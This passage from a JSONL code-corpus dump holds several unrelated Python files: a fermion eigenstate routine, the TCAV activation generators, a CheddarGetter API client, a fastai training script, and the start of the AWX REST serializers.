expired_break_invitation.subject.connect(expired_break)\n expired_break_invitation.addressees.connect(user)\n\n actual_break_invitations = get_pending_break_invitations(actor=user)\n\n assert non_expired_break_invitation in actual_break_invitations\n assert expired_break_invitation not in actual_break_invitations\n"} {"ext": "py", "sha": "1a2ea6f5dd39841efa40a1e50731abfd2df8685c", "content": "import numpy as np\nfrom scipy.sparse import diags\nfrom scipy.sparse import kron\nfrom scipy.sparse import eye\nfrom .two_particles import TwoParticles\nfrom ..util.constants import *\nfrom .. import Eigenstates\n\n\nclass TwoFermions(TwoParticles):\n\n\n def get_eigenstates(self, H, max_states, eigenvalues, eigenvectors):\n\n eigenvectors = eigenvectors.T.reshape(( max_states, *[H.N]*H.ndim) )\n\n # Normalize the eigenvectors\n eigenvectors = eigenvectors/np.sqrt(H.dx**H.ndim)\n \n\n energies = []\n eigenstates_array = []\n\n #antisymmetrize eigenvectors: This is made by applying (𝜓(r1 , s1, r2 , s2) - 𝜓(r2 , s2, r1 , s1))/sqrt(2) to each state.\n for i in range(max_states):\n eigenstate_tmp = (eigenvectors[i] - eigenvectors[i].swapaxes(0,1))/np.sqrt(2)\n\n norm = np.sum(eigenstate_tmp*eigenstate_tmp)*H.dx**H.ndim \n\n TOL = 0.02\n \n # check if is eigenstate_tmp is a normalizable eigenstate. (norm shouldn't be zero)\n if norm > TOL : \n # for some reason when the eigenstate is degenerated it isn't normalized \n #print(\"norm\",norm)\n eigenstate_tmp = eigenstate_tmp/np.sqrt(norm)\n\n \n if eigenstates_array != []: #check if it's the first eigenstate\n inner_product = np.sum(eigenstates_array[-1]* eigenstate_tmp)*H.dx**H.ndim\n #print(\"inner_product\",inner_product)\n else:\n inner_product = 0\n\n\n if np.abs(inner_product) < TOL: # check if is eigenstate_tmp is repeated. (inner_product should be zero)\n\n eigenstates_array += [eigenstate_tmp]\n energies += [eigenvalues[i]]\n\n if H.spatial_ndim == 1:\n type = \"TwoIdenticalParticles1D\"\n elif H.spatial_ndim == 2:\n type = \"TwoIdenticalParticles2D\"\n\n eigenstates = Eigenstates(energies, eigenstates_array, H.extent, H.N, type)\n return eigenstates"} {"ext": "py", "sha": "1a2ea70915788a9b5c94a3368918c20c33a3fba8", "content": "from .Helper import StudyManage,StageControl\nfrom .Helper.StageControl import CStageControl \nfrom .DataStruct.DataSet import CFlowDict\n"} {"ext": "py", "sha": "1a2ea73f55442ae5ef4c6061276deb17c954c9ee", "content": "#!/usr/bin/env python\n\nfrom distutils.core import setup\nfrom catkin_pkg.python_setup import generate_distutils_setup\n\nd = generate_distutils_setup(\n ## don't do this unless you want a globally visible script\n # scripts=['bin/myscript'], \n packages=['rqt_smach'],\n package_dir={'': 'src'},\n scripts=['scripts/rqt_smach']\n)\n\nsetup(**d)\n\n"} {"ext": "py", "sha": "1a2ea7930e307d1b563ec44c435e5d27b999a6bf", "content": "\"\"\"\nCopyright 2018 Google LLC\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n https://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\n\"\"\" Activation generator helper classes for TCAV\"\"\"\n\n'''\n The following class was modified to enable numeric class labels\n'''\n\nfrom abc import ABCMeta\nfrom abc import abstractmethod\nfrom multiprocessing import dummy as multiprocessing\nimport os.path\nimport numpy as np\nimport PIL.Image\nimport tensorflow as tf\n\n\nclass ActivationGeneratorInterface(object):\n \"\"\"Interface for an activation generator for a model\"\"\"\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def process_and_load_activations(self, bottleneck_names, concepts):\n pass\n\n @abstractmethod\n def get_model(self):\n pass\n\n\nclass ActivationGeneratorBase(ActivationGeneratorInterface):\n \"\"\"Basic abstract activation generator for a model\"\"\"\n\n def __init__(self, model, acts_dir, max_examples=500):\n self.model = model\n self.acts_dir = acts_dir\n self.max_examples = max_examples\n\n def get_model(self):\n return self.model\n\n @abstractmethod\n def get_examples_for_concept(self, concept):\n pass\n\n def get_activations_for_concept(self, concept, bottleneck):\n examples = self.get_examples_for_concept(concept)\n return self.get_activations_for_examples(examples, bottleneck)\n\n def get_activations_for_examples(self, examples, bottleneck):\n acts = self.model.run_examples(examples, bottleneck)\n return self.model.reshape_activations(acts).squeeze()\n\n def process_and_load_activations(self, bottleneck_names, concepts):\n acts = {}\n if self.acts_dir and not tf.gfile.Exists(self.acts_dir):\n tf.gfile.MakeDirs(self.acts_dir)\n\n for concept in concepts:\n if concept not in acts:\n acts[concept] = {}\n for bottleneck_name in bottleneck_names:\n acts_path = os.path.join(self.acts_dir, 'acts_{}_{}'.format(\n concept, bottleneck_name)) if self.acts_dir else None\n if acts_path and tf.gfile.Exists(acts_path):\n with tf.gfile.Open(acts_path, 'rb') as f:\n acts[concept][bottleneck_name] = np.load(f).squeeze()\n tf.logging.info('Loaded {} shape {}'.format(\n acts_path, acts[concept][bottleneck_name].shape))\n else:\n acts[concept][bottleneck_name] = self.get_activations_for_concept(\n concept, bottleneck_name)\n if acts_path:\n tf.logging.info('{} does not exist, Making one...'.format(\n acts_path))\n with tf.gfile.Open(acts_path, 'wb') as f:\n np.save(f, acts[concept][bottleneck_name], allow_pickle=False)\n return acts\n\n\nclass ImageActivationGenerator(ActivationGeneratorBase):\n \"\"\"Activation generator for a basic image model\"\"\"\n\n def __init__(self, model, source_dir, acts_dir, max_examples=10):\n self.source_dir = source_dir\n super(ImageActivationGenerator, self).__init__(\n model, acts_dir, max_examples)\n\n def get_examples_for_concept(self, concept):\n concept_dir = os.path.join(self.source_dir, concept)\n print(concept_dir, concept)\n img_paths = [os.path.join(concept_dir, d)\n for d in tf.gfile.ListDirectory(concept_dir)]\n imgs = self.load_images_from_files(img_paths, self.max_examples,\n shape=self.model.get_image_shape()[:2])\n return imgs\n\n def load_image_from_file(self, filename, shape):\n \"\"\"Given a filename, try to open the file. If failed, return None.\n\n Args:\n filename: location of the image file\n shape: the shape of the image file to be scaled\n\n Returns:\n the image if succeeds, None if fails.\n\n Rasies:\n exception if the image was not the right shape.\n \"\"\"\n if not tf.gfile.Exists(filename):\n tf.logging.error('Cannot find file: {}'.format(filename))\n return None\n try:\n img = np.array(PIL.Image.open(tf.gfile.Open(filename, 'rb')).resize(\n shape, PIL.Image.BILINEAR))\n # Normalize pixel values to between 0 and 1.\n img = np.float32(img) / 255.0\n if not (len(img.shape) == 3 and img.shape[2] == 3):\n return None\n else:\n return img\n\n except Exception as e:\n tf.logging.info(e)\n return None\n return img\n\n def load_images_from_files(self, filenames, max_imgs=500,\n do_shuffle=True, run_parallel=True,\n shape=(299, 299),\n num_workers=100):\n \"\"\"Return image arrays from filenames.\n\n Args:\n filenames: locations of image files.\n max_imgs: maximum number of images from filenames.\n do_shuffle: before getting max_imgs files, shuffle the names or not\n run_parallel: get images in parallel or not\n shape: desired shape of the image\n num_workers: number of workers in parallelization.\n\n Returns:\n image arrays\n\n \"\"\"\n imgs = []\n # First shuffle a copy of the filenames.\n filenames = filenames[:]\n if do_shuffle:\n np.random.shuffle(filenames)\n\n if run_parallel:\n pool = multiprocessing.Pool(num_workers)\n imgs = pool.map(\n lambda filename: self.load_image_from_file(filename, shape),\n filenames[:max_imgs])\n imgs = [img for img in imgs if img is not None]\n else:\n for filename in filenames:\n img = self.load_image_from_file(filename, shape)\n if img is not None:\n imgs.append(img)\n if len(imgs) >= max_imgs:\n break\n\n return np.array(imgs)\n"} {"ext": "py", "sha": "1a2ea9756620b796158af7da3296c4fe6127c95d", "content": "import base64\nimport logging\nfrom urllib import urlencode\nfrom dateutil.tz import tzutc\nimport httplib2\n\nfrom sharpy.exceptions import AccessDenied\nfrom sharpy.exceptions import BadRequest\nfrom sharpy.exceptions import CheddarError\nfrom sharpy.exceptions import CheddarFailure\nfrom sharpy.exceptions import NaughtyGateway\nfrom sharpy.exceptions import NotFound\nfrom sharpy.exceptions import PreconditionFailed\nfrom sharpy.exceptions import UnprocessableEntity\n\nclient_log = logging.getLogger('SharpyClient')\n\n\nclass Client(object):\n default_endpoint = 'https://cheddargetter.com/xml'\n\n def __init__(self, username, password, product_code, cache=None,\n timeout=None, endpoint=None):\n '''\n username - Your cheddargetter username (probably an email address)\n password - Your cheddargetter password\n product_code - The product code for the product you want to work with\n cache - A file system path or an object which implements the httplib2\n cache API (optional)\n timeout - Socket level timout in seconds (optional)\n endpoint - An alternate API endpoint (optional)\n '''\n self.username = username\n self.password = password\n self.product_code = product_code\n self.endpoint = endpoint or self.default_endpoint\n self.cache = cache\n self.timeout = timeout\n\n super(Client, self).__init__()\n\n def build_url(self, path, params=None):\n '''\n Constructs the url for a cheddar API resource\n '''\n url = u'%s/%s/productCode/%s' % (\n self.endpoint,\n path,\n self.product_code,\n )\n if params:\n for key, value in params.items():\n url = u'%s/%s/%s' % (url, key, value)\n\n return url\n\n def format_datetime(self, to_format):\n if to_format == 'now':\n str_dt = to_format\n else:\n if getattr(to_format, 'tzinfo', None) is not None:\n utc_value = to_format.astimezone(tzutc())\n else:\n utc_value = to_format\n str_dt = utc_value.strftime('%Y-%m-%dT%H:%M:%S+00:00')\n return str_dt\n\n def format_date(self, to_format):\n if to_format == 'now':\n str_dt = to_format\n else:\n if getattr(to_format, 'tzinfo', None) is not None:\n utc_value = to_format.astimezone(tzutc())\n else:\n utc_value = to_format\n str_dt = utc_value.strftime('%Y-%m-%d')\n return str_dt\n\n def make_request(self, path, params=None, data=None, method=None):\n '''\n Makes a request to the cheddar api using the authentication and\n configuration settings available.\n '''\n # Setup values\n url = self.build_url(path, params)\n client_log.debug('Requesting: %s' % url)\n method = method or 'GET'\n body = None\n headers = {}\n cleaned_data = None\n\n if data:\n method = 'POST'\n body = urlencode(data)\n headers = {\n 'content-type':\n 'application/x-www-form-urlencoded; charset=UTF-8',\n }\n\n # Clean credit card info from when the request gets logged\n # (remove ccv and only show last four of card num)\n cleaned_data = data.copy()\n if 'subscription[ccCardCode]' in cleaned_data:\n del cleaned_data['subscription[ccCardCode]']\n if 'subscription[ccNumber]' in cleaned_data:\n ccNum = cleaned_data['subscription[ccNumber]']\n cleaned_data['subscription[ccNumber]'] = ccNum[-4:]\n\n client_log.debug('Request Method: %s' % method)\n client_log.debug('Request Body (Cleaned Data): %s' % cleaned_data)\n\n # Setup http client\n h = httplib2.Http(cache=self.cache, timeout=self.timeout)\n # Skip the normal http client behavior and send auth headers\n # immediately to save an http request.\n headers['Authorization'] = \"Basic %s\" % base64.standard_b64encode(\n self.username + ':' + self.password).strip()\n\n # Make request\n response, content = h.request(url, method, body=body, headers=headers)\n status = response.status\n client_log.debug('Response Status: %d' % status)\n client_log.debug('Response Content: %s' % content)\n if status != 200 and status != 302:\n exception_class = CheddarError\n if status == 401:\n exception_class = AccessDenied\n elif status == 400:\n exception_class = BadRequest\n elif status == 404:\n exception_class = NotFound\n elif status == 412:\n exception_class = PreconditionFailed\n elif status == 500:\n exception_class = CheddarFailure\n elif status == 502:\n exception_class = NaughtyGateway\n elif status == 422:\n exception_class = UnprocessableEntity\n\n raise exception_class(response, content)\n\n response.content = content\n return response\n"} {"ext": "py", "sha": "1a2eaa285371140e1b57d39a53c34529b0e71209", "content": "from fastbook import *\nfrom fastai.vision.widgets import *\n\n\ndef create_dataloader(path):\n \n print(\" Creating dataloader.. \")\n db = DataBlock(\n blocks=(ImageBlock, CategoryBlock), \n get_items=get_image_files, \n splitter=RandomSplitter(valid_pct=0.2, seed=42),\n get_y=parent_label,\n item_tfms=Resize(128))\n\n db = db.new(\n item_tfms=RandomResizedCrop(224, min_scale=0.5),\n batch_tfms=aug_transforms())\n\n dls = db.dataloaders(path)\n return dls\n\ndef train_model(dls , save_model_name = \"animals_prediction.pkl\"):\n\n print(\" Training Model .. \")\n learn = cnn_learner(dls, resnet18, metrics=error_rate)\n learn.fine_tune(4)\n learn.export(save_model_name)\n return learn\n\n\nif __name__ == \"__main__\":\n path = Path(\"DATA\")\n animals_path = (path/\"animals\")\n dls = create_dataloader(animals_path)\n model = train_model(dls ,\"animals_prediction.pkl\")\n\n"} {"ext": "py", "sha": "1a2eaa6573349bf9471d42646a7167c9f0a978c9", "content": "# -*- coding: utf-8 -*-\nimport argparse\n\n\ndef parse_opts():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-videos_path',\n nargs='+',\n type=str,\n help='视频所在文件夹')\n parser.add_argument(\n '-target_path',\n nargs='+',\n type=str,\n help='要写入的文件夹')\n parser.add_argument(\n '-cut_start',\n nargs='+',\n default=0,\n type=int,\n help='从第几帧开始截取')\n parser.add_argument(\n '-cut_end',\n nargs='+',\n default=0,\n type=int,\n help='截取到第几帧')\n args = parser.parse_args()\n\n return args\n"} {"ext": "py", "sha": "1a2eaaea2d5e98378645ecfb7ae2cc544a174dad", "content": "# Copyright (c) 2015 Ansible, Inc.\n# All Rights Reserved.\n\n# Python\nimport copy\nimport json\nimport logging\nimport re\nfrom collections import OrderedDict\nfrom datetime import timedelta\n\n# OAuth2\nfrom oauthlib import oauth2\nfrom oauthlib.common import generate_token\n\n# Django\nfrom django.conf import settings\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.models import User\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.exceptions import ObjectDoesNotExist, ValidationError as DjangoValidationError\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.encoding import force_text\nfrom django.utils.text import capfirst\nfrom django.utils.timezone import now\nfrom django.utils.functional import cached_property\n\n# Django REST Framework\nfrom rest_framework.exceptions import ValidationError, PermissionDenied\nfrom rest_framework.relations import ManyRelatedField\nfrom rest_framework import fields\nfrom rest_framework import serializers\nfrom rest_framework import validators\nfrom rest_framework.utils.serializer_helpers import ReturnList\n\n# Django-Polymorphic\nfrom polymorphic.models import PolymorphicModel\n\n# AWX\nfrom awx.main.access import get_user_capabilities\nfrom awx.main.constants import (\n SCHEDULEABLE_PROVIDERS,\n ANSI_SGR_PATTERN,\n ACTIVE_STATES,\n CENSOR_VALUE,\n)\nfrom awx.main.models import (\n ActivityStream, AdHocCommand, AdHocCommandEvent, Credential, CredentialInputSource,\n CredentialType, CustomInventoryScript, Group, Host, Instance,\n InstanceGroup, Inventory, InventorySource, InventoryUpdate,\n InventoryUpdateEvent, Job, JobEvent, JobHostSummary, JobLaunchConfig,\n JobTemplate, Label, Notification, NotificationTemplate,\n OAuth2AccessToken, OAuth2Application, Organization, Project,\n ProjectUpdate, ProjectUpdateEvent, RefreshToken, Role, Schedule,\n SystemJob, SystemJobEvent, SystemJobTemplate, Team, UnifiedJob,\n UnifiedJobTemplate, WorkflowJob, WorkflowJobNode,\n WorkflowJobTemplate, WorkflowJobTemplateNode, StdoutMaxBytesExceeded\n)\nfrom awx.main.models.base import VERBOSITY_CHOICES, NEW_JOB_TYPE_CHOICES\nfrom awx.main.models.rbac import (\n get_roles_on_resource, role_summary_fields_generator\n)\nfrom awx.main.fields import ImplicitRoleField, JSONBField\nfrom awx.main.utils import (\n get_type_for_model, get_model_for_type,\n camelcase_to_underscore, getattrd, parse_yaml_or_json,\n has_model_field_prefetched, extract_ansible_vars, encrypt_dict,\n prefetch_page_capabilities, get_external_account)\nfrom awx.main.utils.filters import SmartFilter\nfrom awx.main.redact import UriCleaner, REPLACE_STR\n\nfrom awx.main.validators import vars_validate_or_raise\n\nfrom awx.api.versioning import reverse\nfrom awx.api.fields import (BooleanNullField, CharNullField, ChoiceNullField,\n VerbatimField, DeprecatedCredentialField)\n\nlogger = logging.getLogger('awx.api.serializers')\n\n# Fields that should be summarized regardless of object type.\nDEFAULT_SUMMARY_FIELDS = ('id', 'name', 'description')# , 'created_by', 'modified_by')#, 'type')\n\n# Keys are fields (foreign keys) where, if found on an instance, summary info\n# should be added to the serialized data. Values are a tuple of field names on\n# the related object to include in the summary data (if the field is present on\n# the related object).\nSUMMARIZABLE_FK_FIELDS = {\n 'organization': DEFAULT_SUMMARY_FIELDS,\n 'user': ('id', 'username', 'first_name', 'last_name'),\n 'application': ('id', 'name'),\n 'team': DEFAULT_SUMMARY_FIELDS,\n 'inventory': DEFAULT_SUMMARY_FIELDS + ('has_active_failures',\n 'total_hosts',\n 'hosts_with_active_failures',\n 'total_groups',\n 'groups_with_active_failures',\n 'has_inventory_sources',\n 'total_inventory_sources',\n 'inventory_sources_with_failures',\n 'organization_id',\n 'kind',\n 'insights_credential_id',),\n 'host': DEFAULT_SUMMARY_FIELDS + ('has_active_failures',\n 'has_inventory_sources'),\n 'group': DEFAULT_SUMMARY_FIELDS + ('has_active_failures',\n 'total_hosts',\n 'hosts_with_active_failures',\n 'total_groups',\n 'groups_with_active_failures',\n 'has_inventory_sources'),\n 'project': DEFAULT_SUMMARY_FIELDS + ('status', 'scm_type'),\n 'source_project': DEFAULT_SUMMARY_FIELDS + ('status', 'scm_type'),\n 'project_update': DEFAULT_SUMMARY_FIELDS + ('status', 'failed',),\n 'credential': DEFAULT_SUMMARY_FIELDS + ('kind', 'cloud', 'credential_type_id'),\n 'job': DEFAULT_SUMMARY_FIELDS + ('status', 'failed', 'elapsed', 'type'),\n 'job_template': DEFAULT_SUMMARY_FIELDS,\n 'workflow_job_template': DEFAULT_SUMMARY_FIELDS,\n 'workflow_job': DEFAULT_SUMMARY_FIELDS,\n 'schedule': DEFAULT_SUMMARY_FIELDS + ('next_run',),\n 'unified_job_template': DEFAULT_SUMMARY_FIELDS + ('unified_job_type',),\n 'last_job': DEFAULT_SUMMARY_FIELDS + ('finished', 'status', 'failed', 'license_error'),\n 'last_job_host_summary': DEFAULT_SUMMARY_FIELDS + ('failed',),\n 'last_update': DEFAULT_SUMMARY_FIELDS + ('status', 'failed', 'license_error'),\n 'current_update': DEFAULT_SUMMARY_FIELDS + ('status', 'failed', 'license_error'),\n 'current_job': DEFAULT_SUMMARY_FIELDS + ('status', 'failed', 'license_error'),\n 'inventory_source': ('source', 'last_updated', 'status'),\n 'custom_inventory_script': DEFAULT_SUMMARY_FIELDS,\n 'source_script': ('name', 'description'),\n 'role': ('id', 'role_field'),\n 'notification_template': DEFAULT_SUMMARY_FIELDS,\n 'instance_group': {'id', 'name', 'controller_id'},\n 'insights_credential': DEFAULT_SUMMARY_FIELDS,\n 'source_credential': DEFAULT_SUMMARY_FIELDS + ('kind', 'cloud', 'credential_type_id'),\n 'target_credential': DEFAULT_SUMMARY_FIELDS + ('kind', 'cloud', 'credential_type_id'),\n}\n\n\ndef reverse_gfk(content_object, request):\n '''\n Computes a reverse for a GenericForeignKey field.\n\n Returns a dictionary of the form\n { '': reverse() }\n for example\n { 'organization': '/api/v2/organizations/1/' }\n '''\n if content_object is None or not hasattr(content_object, 'get_absolute_url'):\n return {}\n\n return {\n camelcase_to_underscore(content_object.__class__.__name__): content_object.get_absolute_url(request=request)\n }\n\n\nclass CopySerializer(serializers.Serializer):\n\n name = serializers.CharField()\n\n def validate(self, attrs):\n name = attrs.get('name')\n view = self.context.get('view', None)\n obj = view.get_object()\n if name == obj.name:\n raise serializers.ValidationError(_(\n 'The original object is already named {}, a copy from'\n ' it cannot have the same name.'.format(name)\n ))\n return attrs\n\n\nclass BaseSerializerMetaclass(serializers.SerializerMetaclass):\n '''\n Custom metaclass to enable attribute inheritance from Meta objects on\n serializer base classes.\n\n Also allows for inheriting or updating field lists from base class(es):\n\n class Meta:\n\n # Inherit all fields from base class.\n fields = ('*',)\n\n # Inherit all fields from base class and add 'foo'.\n fields = ('*', 'foo')\n\n # Inherit all fields from base class except 'bar'.\n fields = ('*', '-bar')\n\n # Define fields as 'foo' and 'bar'; ignore base class fields.\n fields = ('foo', 'bar')\n\n # Extra field kwargs dicts are also merged from base classes.\n extra_kwargs = {\n 'foo': {'required': True},\n 'bar': {'read_only': True},\n }\n\n # If a subclass were to define extra_kwargs as:\n extra_kwargs = {\n 'foo': {'required': False, 'default': ''},\n 'bar': {'label': 'New Label for Bar'},\n }\n\n # The resulting value of extra_kwargs would be:\n extra_kwargs = {\n 'foo': {'required': False, 'default': ''},\n 'bar': {'read_only': True, 'label': 'New Label for Bar'},\n }\n\n # Extra field kwargs cannot be removed in subclasses, only replaced.\n\n '''\n\n @staticmethod\n def _is_list_of_strings(x):\n return isinstance(x, (list, tuple)) and all([isinstance(y, str) for y in x])\n\n @staticmethod\n def _is_extra_kwargs(x):\n return isinstance(x, dict) and all([isinstance(k, str) and isinstance(v, dict) for k,v in x.items()])\n\n @classmethod\n def _update_meta(cls, base, meta, other=None):\n for attr in dir(other):\n if attr.startswith('_'):\n continue\n val = getattr(other, attr)\n meta_val = getattr(meta, attr, None)\n # Special handling for lists/tuples of strings (field names).\n if cls._is_list_of_strings(val) and cls._is_list_of_strings(meta_val or []):\n meta_val = meta_val or []\n new_vals = []\n except_vals = []\n if base: # Merge values from all bases.\n new_vals.extend([x for x in meta_val])\n for v in val:\n if not base and v == '*': # Inherit all values from previous base(es).\n new_vals.extend([x for x in meta_val])\n elif not base and v.startswith('-'): # Except these values.\n except_vals.append(v[1:])\n else:\n new_vals.append(v)\n val = []\n for v in new_vals:\n if v not in except_vals and v not in val:\n val.append(v)\n val = tuple(val)\n # Merge extra_kwargs dicts from base classes.\n elif cls._is_extra_kwargs(val) and cls._is_extra_kwargs(meta_val or {}):\n meta_val = meta_val or {}\n new_val = {}\n if base:\n for k,v in meta_val.items():\n new_val[k] = copy.deepcopy(v)\n for k,v in val.items():\n new_val.setdefault(k, {}).update(copy.deepcopy(v))\n val = new_val\n # Any other values are copied in case they are mutable objects.\n else:\n val = copy.deepcopy(val)\n setattr(meta, attr, val)\n\n def __new__(cls, name, bases, attrs):\n meta = type('Meta', (object,), {})\n for base in bases[::-1]:\n cls._update_meta(base, meta, getattr(base, 'Meta', None))\n cls._update_meta(None, meta, attrs.get('Meta', meta))\n attrs['Meta'] = meta\n return super(BaseSerializerMetaclass, cls).__new__(cls, name, bases, attrs)\n\n\nclass BaseSerializer(serializers.ModelSerializer, metaclass=BaseSerializerMetaclass):\n\n class Meta:\n fields = ('id', 'type', 'url', 'related', 'summary_fields', 'created',\n 'modified', 'name', 'description')\n summary_fields = ()\n summarizable_fields = ()\n\n # add the URL and related resources\n type = serializers.SerializerMethodField()\n url = serializers.SerializerMethodField()\n related = serializers.SerializerMethodField('_get_related')\n summary_fields = serializers.SerializerMethodField('_get_summary_fields')\n\n # make certain fields read only\n created = serializers.SerializerMethodField()\n modified = serializers.SerializerMethodField()\n\n def __init__(self, *args, **kwargs):\n super(BaseSerializer, self).__init__(*args, **kwargs)\n # The following lines fix the problem of being able to pass JSON dict into PrimaryKeyRelatedField.\n data = kwargs.get('data', False)\n if data:\n for field_name, field_instance in self.fields.items():\n if isinstance(field_instance, ManyRelatedField) and not field_instance.read_only:\n if isinstance(data.get(field_name, False), dict):\n raise serializers.ValidationError(_('Cannot use dictionary for %s' % field_name))\n\n @property\n def version(self):\n return 2\n\n def get_type(self, obj):\n return get_type_for_model(self.Meta.model)\n\n def get_types(self):\n return [self.get_type(None)]\n\n def get_type_choices(self):\n type_name_map = {\n 'job': _('Playbook Run'),\n 'ad_hoc_command': _('Command'),\n 'project_update': _('SCM Update'),\n 'inventory_update': _('Inventory Sync'),\n 'system_job': _('Management Job'),\n 'workflow_job': _('Workflow Job'),\n 'workflow_job_template': _('Workflow Template'),\n 'job_template': _('Job Template')\n }\n choices = []\n for t in self.get_types():\n name = _(type_name_map.get(t, force_text(get_model_for_type(t)._meta.verbose_name).title()))\n choices.append((t, name))\n return choices\n\n def get_url(self, obj):\n if obj is None or not hasattr(obj, 'get_absolute_url'):\n return ''\n elif isinstance(obj, User):\n return self.reverse('api:user_detail', kwargs={'pk': obj.pk})\n else:\n return obj.get_absolute_url(request=self.context.get('request'))\n\n def filter_field_metadata(self, fields, method):\n \"\"\"\n Filter field metadata based on the request method.\n This it intended to be extended by subclasses.\n \"\"\"\n return fields\n\n def _get_related(self, obj):\n return {} if obj is None else self.get_related(obj)\n\n def _generate_named_url(self, url_path, obj, node):\n url_units = url_path.split('/')\n named_url = node.generate_named_url(obj)\n url_units[4] = named_url\n return '/'.join(url_units)\n\n def get_related(self, obj):\n res = OrderedDict()\n view = self.context.get('view', None)\n if view and (hasattr(view, 'retrieve') or view.request.method == 'POST') and \\\n type(obj) in settings.NAMED_URL_GRAPH:\n original_url = self.get_url(obj)\n res['named_url'] = self._generate_named_url(\n original_url, obj, settings.NAMED_URL_GRAPH[type(obj)]\n )\n if getattr(obj, 'created_by', None):\n res['created_by'] = self.reverse('api:user_detail', kwargs={'pk': obj.created_by.pk})\n if getattr(obj, 'modified_by', None):\n res['modified_by'] = self.reverse('api:user_detail', kwargs={'pk': obj.modified_by.pk})\n return res\n\n def _get_summary_fields(self, obj):\n return {} if obj is None else self.get_summary_fields(obj)\n\n def get_summary_fields(self, obj):\n # Return values for certain fields on related objects, to simplify\n # displaying lists of items without additional API requests.\n summary_fields = OrderedDict()\n for fk, related_fields in SUMMARIZABLE_FK_FIELDS.items():\n try:\n # A few special cases where we don't want to access the field\n # because it results in additional queries.\n if fk == 'job' and isinstance(obj, UnifiedJob):\n continue\n if fk == 'project' and (isinstance(obj, InventorySource) or\n isinstance(obj, Project)):\n continue\n\n try:\n fkval = getattr(obj, fk, None)\n except ObjectDoesNotExist:\n continue\n if fkval is None:\n continue\n if fkval == obj:\n continue\n summary_fields[fk] = OrderedDict()\n for field in related_fields:\n\n fval = getattr(fkval, field, None)\n\n if fval is None and field == 'type':\n if isinstance(fkval, PolymorphicModel):\n fkval = fkval.get_real_instance()\n fval = get_type_for_model(fkval)\n elif fval is None and field == 'unified_job_type' and isinstance(fkval, UnifiedJobTemplate):\n fkval = fkval.get_real_instance()\n fval = get_type_for_model(fkval._get_unified_job_class())\n if fval is not None:\n summary_fields[fk][field] = fval\n # Can be raised by the reverse accessor for a OneToOneField.\n except ObjectDoesNotExist:\n pass\n if getattr(obj, 'created_by', None):\n summary_fields['created_by'] = OrderedDict()\n for field in SUMMARIZABLE_FK_FIELDS['user']:\n summary_fields['created_by'][field] = getattr(obj.created_by, field)\n if getattr(obj, 'modified_by', None):\n summary_fields['modified_by'] = OrderedDict()\n for field in SUMMARIZABLE_FK_FIELDS['user']:\n summary_fields['modified_by'][field] = getattr(obj.modified_by, field)\n\n # RBAC summary fields\n roles = {}\n for field in obj._meta.get_fields():\n if type(field) is ImplicitRoleField:\n roles[field.name] = role_summary_fields_generator(obj, field.name)\n if len(roles) > 0:\n summary_fields['object_roles'] = roles\n\n # Advance display of RBAC capabilities\n if hasattr(self, 'show_capabilities'):\n user_capabilities = self._obj_capability_dict(obj)\n if user_capabilities:\n summary_fields['user_capabilities'] = user_capabilities\n\n return summary_fields\n\n def _obj_capability_dict(self, obj):\n \"\"\"\n Returns the user_capabilities dictionary for a single item\n If inside of a list view, it runs the prefetching algorithm for\n the entire current page, saves it into context\n \"\"\"\n view = self.context.get('view', None)\n parent_obj = None\n if view and hasattr(view, 'parent_model') and hasattr(view, 'get_parent_object'):\n parent_obj = view.get_parent_object()\n if view and view.request and view.request.user:\n capabilities_cache = {}\n # if serializer has parent, it is ListView, apply page capabilities prefetch\n if self.parent and hasattr(self, 'capabilities_prefetch') and self.capabilities_prefetch:\n qs = self.parent.instance\n if 'capability_map' not in self.context:\n if hasattr(self, 'polymorphic_base'):\n model = self.polymorphic_base.Meta.model\n prefetch_list = self.polymorphic_base._capabilities_prefetch\n else:\n model = self.Meta.model\n prefetch_list = self.capabilities_prefetch\n self.context['capability_map'] = prefetch_page_capabilities(\n model, qs, prefetch_list, view.request.user\n )\n if obj.id in self.context['capability_map']:\n capabilities_cache = self.context['capability_map'][obj.id]\n return get_user_capabilities(\n view.request.user, obj, method_list=self.show_capabilities, parent_obj=parent_obj,\n capabilities_cache=capabilities_cache\n )\n else:\n # Contextual information to produce user_capabilities doesn't exist\n return {}\n\n def get_created(self, obj):\n if obj is None:\n return None\n elif isinstance(obj, User):\n return obj.date_joined\n elif hasattr(obj, 'created'):\n return obj.created\n return None\n\n def get_modified(self, obj):\n if obj is None:\n return None\n elif isinstance(obj, User):\n return obj.last_login # Not actually exposed for User.\n elif hasattr(obj, 'modified'):\n return obj.modified\n return None\n\n def get_extra_kwargs(self):\n extra_kwargs = super(BaseSerializer, self).get_extra_kwargs()\n if self.instance:\n read_only_on_update_fields = getattr(self.Meta, 'read_only_on_update_fields', tuple())\n for field_name in read_only_on_update_fields:\n kwargs = extra_kwargs.get(field_name, {})\n kwargs['read_only'] = True\n extra_kwargs[field_name] = kwargs\n return extra_kwargs\n\n def build_standard_field(self, field_name, model_field):\n # DRF 3.3 serializers.py::build_standard_field() -> utils/field_mapping.py::get_field_kwargs() short circuits\n # when a Model's editable field is set to False. The short circuit skips choice rendering.\n #\n # This logic is to force rendering choice's on an uneditable field.\n # Note: Consider expanding this rendering for more than just choices fields\n # Note: This logic works in conjuction with\n if hasattr(model_field, 'choices') and model_field.choices:\n was_editable = model_field.editable\n model_field.editable = True\n\n field_class, field_kwargs = super(BaseSerializer, self).build_standard_field(field_name, model_field)\n if hasattr(model_field, 'choices') and model_field.choices:\n model_field.editable = was_editable\n if was_editable is False:\n field_kwargs['read_only'] = True\n\n # Pass model field default onto the serializer field if field is not read-only.\n if model_field.has_default() and not field_kwargs.get('read_only', False):\n field_kwargs['default'] = field_kwargs['initial'] = model_field.get_default()\n\n # Enforce minimum value of 0 for PositiveIntegerFields.\n if isinstance(model_field, (models.PositiveIntegerField, models.PositiveSmallIntegerField)) and 'choices' not in field_kwargs:\n field_kwargs['min_value'] 